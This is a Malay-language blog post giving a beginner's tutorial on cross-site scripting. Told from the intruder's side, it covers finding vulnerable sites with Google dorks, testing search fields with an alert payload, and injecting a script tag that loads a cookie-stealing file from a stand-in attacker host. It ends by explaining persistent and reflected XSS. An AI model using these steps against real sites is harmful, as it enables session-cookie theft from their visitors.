Root Js

powered by
Socialbar

Basic About XSS


XSS ( Cross Site Scripting)

Apa itu XSS atau singkatan nama Cross Site Scripting?
Anda boleh rujuk dihalaman ini. Klik



Suntikan Dan Kebocoran XSS

Langkah 1 : Mencari laman yang "Vuln"

Seperti biasa, penceroboh akan menggunakan "google dork" untuk melakukan pencarian. Sebagai contoh, saya akan mencari "search?q=" sehingga berjumpa dengan laman yang mempunyai "Vuln".

Langkah 2 : Mencuba Dengan Vulnerability Tersebut

Dalam langkah untuk mencuba kebocoran tersebut, kita perlu mencari POST dan mendapatkan parameter. Keliru? Ok, ia adalah 'input field' sahaja yang akan dihantar kepada pelayan. Sebagai contoh, search query seperti username atau password. Terdapat dua cara bagaimana mencubanya :

Cara Pertama : 
Suntikan di dalam form box (terutama kotak pencarian)
Penceroboh boleh memasukkan malcious skrip ke dalam kotak pencarian dan menekan butang pencarian. Ini akan mendorong malcious script tersebut "run" terus ke dalam laman terbabit.

Cara Kedua :
Dalam cara ini, mungkin tiada form box. Jadi mereka akan menggunakan url field segera.


Sebagai contoh :

http://vulnerablewebsite/search?q=malicious_script_goes_here

atau untuk mencuba, masukkan 

<script>alert('hi');</script>

ke dalam input fields.

Contoh :
Menggunakan cara pertama, anda boleh masukkan code ke dalam kotak pencarian dan menekan butang pencarian.
atau
Menggunakan cara kedua, anda boleh memasukkan code ke dalam url seperti ini :

http://vulnerablewebsite/search?q=<script>alert('hi');</script>

Jika ia menunjukkan "Hai" dalam popup mesej laman tersebut VULN UNTUK XSS.

Langkah 3 : Menyuntik Malcious Skrip

Selepas mencari laman yang menpunyai kebocoran, penceroboh akan menyuntik malcious skrip. Ia mungkin akan mendorong kepada pencurian "cookies" dan serangan malware.

Andaikan penyerang telah mempunyai skrip untuk mencuri cookies di dalam laman terbabit. Secara amnya,malcious skrip beliau adalah http://attackerSite/malicious.js

Beliau boleh menyuntik malcious skrip terbabit ke dalam laman yang vuln seperti ini :

<script src=http://attackerSite/malicious.js></script>

Apabila pelawat melayari laman terbabit, malcious skrip terbabit akan 'run' dan menyebabkan kecurian cookies.

Jenis XSS ini sebenarnya berdasarkan kemampuan persisting :

Terdapat dua jenis XSS berdasarkan kemampuan persisting ini iaitu Persistent dan Non-Persistent.



Persistent XSS (XSS Yang Berterusan) :

Adalah kebocoran XSS yang berisiko, ia menyimpan data melibatkan di dalam pelayan. Jadi secara tidak langsung,suntikan skrip asing tersimpan secara kekal di dalam applikasi laman. Ia akan menunjukkan kepada pengguna lain apabila mereka melayari laman terbabit. Jika penceroboh menyuntik malware, pengguna yang biasa melayarinya juga turut akan terjejas.

Sebagai contoh :
Sesetengah laman mungkin menyimpan search query mereka dalam usaha untuk menjejak minat pengguna. Hasilnya, keputusan ini akan kekal tersimpan dalam XSS.

Non-Persistent XSS (XSS Tidak Berterusan) :

Juga dikenali sebagai Relected XSS. Dalam kes ini, penyimpanan malcious skrip ini adalah untuk tempoh waktu yang singkat sahaja (bermakna ia tidak akan ditunjukkan kepada pengguna lain). Penceroboh biasanya memerangkap pengguna untuk melayari URL dengan suntikan. Sebagai pengguna yang kerap melayarinya,mereka akan mempercayai link terbabit dan mendorong kepada pencurian cookies.

Sebagai contoh :
Jika anda mencari di dalam sesetengah laman, ia akan kembali ke keputusan searching string anda. Akibatnya, code asing terbabit akan run dalam tempoh yang singkat sahaja.




Sumber Dan Kredit : Alien Crew




0 ulasan:

Post a Comment

Please Do Not Spam Here Moron. Everyone Welcome Here.